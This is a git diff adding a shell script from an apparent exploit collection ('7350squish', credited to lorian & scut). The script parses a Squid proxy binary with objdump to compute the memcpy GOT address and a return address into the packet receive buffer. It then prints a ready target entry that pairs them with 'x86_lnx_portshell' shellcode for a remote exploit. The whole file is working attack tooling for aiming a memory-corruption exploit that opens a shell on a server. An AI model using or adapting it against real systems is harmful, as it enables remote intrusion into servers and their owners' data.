initial

1 files changed, 67 insertions, 0 deletions

diff --git a/exploits/7350squish/offset-find.sh b/exploits/7350squish/offset-find.sh
new file mode 100644
index 0000000..dad7232
--- /dev/null
+++ b/exploits/7350squish/offset-find.sh
@@ -0,0 +1,67 @@
+#!/bin/sh
+
+# 7350squish offset finder
+# lorian & scut
+
+check_util ()
+{
+        for util in $*; do
+                echo -n "checking for $util: "
+                if ! which $util; then
+                        echo "not found, aborting"
+                        exit
+                fi
+        done
+}
+
+echo "7350squish exploit offset finder"
+echo
+
+if [ $# != 1 ]; then
+        echo "usage: $0 /path/to/squid/binary"
+        echo
+        exit
+fi;
+
+
+check_util awk objdump
+
+echo
+
+bufferbase=`objdump -D $1 2>/dev/null | \
+        grep "68 00 02 00 00" -A 1 | tail -1 | cut -d '$' -f2`
+
+retaddr=`echo $bufferbase | awk 'function hex2num(s)
+{
+        n = length (s)
+        v = 0
+        for (i = 1; i < n-1; i++) {
+                c = tolower(substr (s, i+2, 1));
+                if (c=="a") c=10;
+                if (c=="b") c=11;
+                if (c=="c") c=12;
+                if (c=="d") c=13;
+                if (c=="e") c=14;
+                if (c=="f") c=15;
+                v = v * 16 + c;
+        }
+        return v
+}
+{
+        printf ("0x%08x\n", hex2num ($0) + 144)
+}'`
+
+#retaddr=`echo $bufferbase | awk '{ printf ("0x%08x\n", $0 + 144) }'`
+
+retloc=`objdump -R $1 2>/dev/null | \
+        grep "memcpy$" | awk '{ printf ("0x%s", $1) }'`
+
+echo "{ \"NEW TARGET\","
+echo "x86_lnx_portshell, sizeof (x86_lnx_portshell) - 1,"
+echo "$retloc, /* GOT: memcpy */"
+echo "$retaddr, /* packet receive buffer + 0x90 */"
+echo "0x0182, 288 },"
+echo
+
+echo finished.
+